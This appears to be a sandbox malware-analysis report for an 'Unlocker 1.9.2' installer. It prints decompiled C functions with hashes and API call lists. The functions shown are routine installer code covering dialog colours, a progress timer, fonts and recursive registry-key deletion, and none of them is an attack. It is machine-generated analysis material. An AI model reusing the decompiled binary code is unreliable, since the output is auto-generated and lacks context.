                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Unlocker1.9.2.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 589700163-3390710162
                                                                                                                                                              • Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
                                                                                                                                                              • Instruction ID: 6e21827f4117d195ccc2fee92ee9dbca2865e9be55a4e6ca6148cbd3e4a13511
                                                                                                                                                              • Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
                                                                                                                                                              • Instruction Fuzzy Hash: F011905580CB942AFB3206384C48B776F99CB67764F58407BE8C4723C2D67C5C429B6D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403DF6(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                                                                              0x00403e08
                                                                                                                                                              0x00403e9c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403e9c
                                                                                                                                                              0x00403e19
                                                                                                                                                              0x00403e1d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403e23
                                                                                                                                                              0x00403e2c
                                                                                                                                                              0x00403e2f
                                                                                                                                                              0x00403e2f
                                                                                                                                                              0x00403e35
                                                                                                                                                              0x00403e3b
                                                                                                                                                              0x00403e3b
                                                                                                                                                              0x00403e47
                                                                                                                                                              0x00403e4d
                                                                                                                                                              0x00403e54
                                                                                                                                                              0x00403e57
                                                                                                                                                              0x00403e5a
                                                                                                                                                              0x00403e5c
                                                                                                                                                              0x00403e5c
                                                                                                                                                              0x00403e64
                                                                                                                                                              0x00403e6a
                                                                                                                                                              0x00403e6a
                                                                                                                                                              0x00403e74
                                                                                                                                                              0x00403e79
                                                                                                                                                              0x00403e7c
                                                                                                                                                              0x00403e81
                                                                                                                                                              0x00403e84
                                                                                                                                                              0x00403e84
                                                                                                                                                              0x00403e94
                                                                                                                                                              0x00403e94
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                              • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                                                              • Instruction ID: 6c7fdd900eb09a88ca35fb2207b5deae9db7ec429e3ae93f4f07cdddb38981b8
                                                                                                                                                              • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                                                              • Instruction Fuzzy Hash: 1F219671904744ABCB219F78DD08B4B7FF8AF00715F048A2AF856E22E1C338EA04CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040464A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040464A(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                                                              0x00404658
                                                                                                                                                              0x00404665
                                                                                                                                                              0x0040466b
                                                                                                                                                              0x004046a9
                                                                                                                                                              0x004046a9
                                                                                                                                                              0x004046b8
                                                                                                                                                              0x004046bf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004046c1
                                                                                                                                                              0x0040466d
                                                                                                                                                              0x0040467c
                                                                                                                                                              0x00404684
                                                                                                                                                              0x00404687
                                                                                                                                                              0x00404699
                                                                                                                                                              0x0040469f
                                                                                                                                                              0x004046a6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004046a6
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404665
                                                                                                                                                              • GetMessagePos.USER32 ref: 0040466D
                                                                                                                                                              • ScreenToClient.USER32 ref: 00404687
                                                                                                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404699
                                                                                                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004046BF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                              • String ID: f
                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                              • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                                                              • Instruction ID: 811e074b116e6ce6d11e192741490be2760717d42b69e64a674173994bb84636
                                                                                                                                                              • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                                                              • Instruction Fuzzy Hash: 4E014C71D00219BADB00DBA4DC85FFEBBB8AB59711F10052ABA00B61D0D7B8A9058BA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00402B3B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40b018; // 0x10753b
					_t11 =  *0x41f028; // 0x10753f
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                                                                              0x00402b48
                                                                                                                                                              0x00402b56
                                                                                                                                                              0x00402b5c
                                                                                                                                                              0x00402b5c
                                                                                                                                                              0x00402b6a
                                                                                                                                                              0x00402b6c
                                                                                                                                                              0x00402b72
                                                                                                                                                              0x00402b79
                                                                                                                                                              0x00402b7b
                                                                                                                                                              0x00402b7b
                                                                                                                                                              0x00402b91
                                                                                                                                                              0x00402ba1
                                                                                                                                                              0x00402bb3
                                                                                                                                                              0x00402bb3
                                                                                                                                                              0x00402bbb

                                                                                                                                                              APIs
                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                                                                                              • MulDiv.KERNEL32(0010753B,00000064,0010753F), ref: 00402B81
                                                                                                                                                              • wsprintfA.USER32 ref: 00402B91
                                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 00402BB3
                                                                                                                                                              Strings
                                                                                                                                                              • verifying installer: %d%%, xrefs: 00402B8B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                                                              • Opcode ID: 942454595b55506ed27eeb1e7d8b1282508b27149c9d2e8fb24462be395a0e5b
                                                                                                                                                              • Instruction ID: e41715c37a5330c5740685503c003044c4943c79b663b03d39d41db920bc543d
                                                                                                                                                              • Opcode Fuzzy Hash: 942454595b55506ed27eeb1e7d8b1282508b27149c9d2e8fb24462be395a0e5b
                                                                                                                                                              • Instruction Fuzzy Hash: 34014470A00209ABDB249F60DD09EAE3779AB04345F008039FA16B92D1D7B49A559F99
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00401D1B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 67%
                                                                                                                                                              			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af54->lfHeight =  ~(MulDiv(E004029D9(2), _t6, 0x48));
				 *0x40af64 = E004029D9(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af6b = 1;
				 *0x40af68 = _t11 & 0x00000001;
				 *0x40af69 = _t11 & 0x00000002;
				 *0x40af6a = _t11 & 0x00000004;
				E004059FF(_t18, _t24, _t26, "MS Shell Dlg",  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af54);
				_push(_t14);
				_push(_t26);
				E0040593B();
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                                                                                              0x00401d29
                                                                                                                                                              0x00401d42
                                                                                                                                                              0x00401d4c
                                                                                                                                                              0x00401d51
                                                                                                                                                              0x00401d5c
                                                                                                                                                              0x00401d63
                                                                                                                                                              0x00401d75
                                                                                                                                                              0x00401d7b
                                                                                                                                                              0x00401d80
                                                                                                                                                              0x00401d8a
                                                                                                                                                              0x004024b8
                                                                                                                                                              0x00401561
                                                                                                                                                              0x00402833
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(?), ref: 00401D22
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                                                                              • CreateFontIndirectA.GDI32(0040AF54), ref: 00401D8A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirect
                                                                                                                                                              • String ID: MS Shell Dlg
                                                                                                                                                              • API String ID: 3272661963-76309092
                                                                                                                                                              • Opcode ID: aaa704804153b4156d33932d66762c168f337da226587c5d1751100b1e088207
                                                                                                                                                              • Instruction ID: 822a585a95499be2ccb46a886614a983d19f7779af01092212c1c8a44adbdb5d
                                                                                                                                                              • Opcode Fuzzy Hash: aaa704804153b4156d33932d66762c168f337da226587c5d1751100b1e088207
                                                                                                                                                              • Instruction Fuzzy Hash: 80F04FF1A49742AEE70167B0AE0AB9A3B659719306F14043AF242BA1E2C5BC0454DB7F
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00402A36 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E00402A36(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423f30; // 0x100
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A36(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405CFF(2);
					if(_t27 == 0) {
						__eflags =  *0x423f30; // 0x100
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f30, 0);
				}
				return _t18;
			}










                                                                                                                                                              0x00402a46
                                                                                                                                                              0x00402a57
                                                                                                                                                              0x00402a5f
                                                                                                                                                              0x00402a87
                                                                                                                                                              0x00402a6e
                                                                                                                                                              0x00402a71
                                                                                                                                                              0x00402ac1
                                                                                                                                                              0x00402ac7
                                                                                                                                                              0x00402ac9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402ac9
                                                                                                                                                              0x00402a7e
                                                                                                                                                              0x00402a83
                                                                                                                                                              0x00402a85
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402a85
                                                                                                                                                              0x00402a9c
                                                                                                                                                              0x00402aa4
                                                                                                                                                              0x00402aab
                                                                                                                                                              0x00402ad1
                                                                                                                                                              0x00402ad7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402adf
                                                                                                                                                              0x00402ae5
                                                                                                                                                              0x00402ae7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402ae7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402aba
                                                                                                                                                              0x00402ace

                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000100,?), ref: 00402A57
                                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1912718029-0
                                                                                                                                                              • Opcode ID: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
                                                                                                                                                              • Instruction ID: 582bceb6e4b24316922a1ee6e85d565da044e62c79b522cd3b8563d0d5e38007
                                                                                                                                                              • Opcode Fuzzy Hash: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
                                                                                                                                                              • Instruction Fuzzy Hash: E7111771A10049BEEF31AF90DE49DAF7B7DEB44345B104036F906A10A0DBB49E51AF69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                                                                              0x00401ccb
                                                                                                                                                              0x00401cd2
                                                                                                                                                              0x00401d01
                                                                                                                                                              0x00401d09
                                                                                                                                                              0x00401d10
                                                                                                                                                              0x00401d10
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32 ref: 00401CC5
                                                                                                                                                              • GetClientRect.USER32 ref: 00401CD2
                                                                                                                                                              • LoadImageA.USER32 ref: 00401CF3
                                                                                                                                                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                              • Opcode ID: aab1ff915591a61a6dff0f8bf18086dee3b735981cb00012526b248d1bc18b45
                                                                                                                                                              • Instruction ID: c9eade559dcb8dabe12f7fb8fefc2ecb3bb817c4e851fb83d30c8e131ed4808d
                                                                                                                                                              • Opcode Fuzzy Hash: aab1ff915591a61a6dff0f8bf18086dee3b735981cb00012526b248d1bc18b45
                                                                                                                                                              • Instruction Fuzzy Hash: B5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004037EF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004037EF(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405954(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ec4; // 0x2c
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423e90; // 0x73eeb0
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ec0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423660 = _t18[1];
					 *0x423f28 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42365c = _t23;
						E0040593B(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420450, E004059FF(_t13, _t24, _t26, "Unlocker 1.9.2 Setup", 0xfffffffe));
						_t11 =  *0x423eac; // 0x7
						_t27 =  *0x423ea8; // 0x73f1dc
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x73f1f4
								_t11 = E004059FF(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                                                                                                                                              0x004037f3
                                                                                                                                                              0x004037f8
                                                                                                                                                              0x004037fe
                                                                                                                                                              0x00403803
                                                                                                                                                              0x00403803
                                                                                                                                                              0x0040380b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040380d
                                                                                                                                                              0x00403813
                                                                                                                                                              0x0040381b
                                                                                                                                                              0x0040381d
                                                                                                                                                              0x00403823
                                                                                                                                                              0x00403823
                                                                                                                                                              0x00403825
                                                                                                                                                              0x00403831
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403835
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403837
                                                                                                                                                              0x0040383c
                                                                                                                                                              0x00403845
                                                                                                                                                              0x0040384b
                                                                                                                                                              0x00403850
                                                                                                                                                              0x00403864
                                                                                                                                                              0x0040386f
                                                                                                                                                              0x00403887
                                                                                                                                                              0x0040388d
                                                                                                                                                              0x00403892
                                                                                                                                                              0x0040389a
                                                                                                                                                              0x004038bb
                                                                                                                                                              0x004038bb
                                                                                                                                                              0x004038bb
                                                                                                                                                              0x0040389c
                                                                                                                                                              0x0040389e
                                                                                                                                                              0x0040389e
                                                                                                                                                              0x004038a2
                                                                                                                                                              0x004038a5
                                                                                                                                                              0x004038a9
                                                                                                                                                              0x004038a9
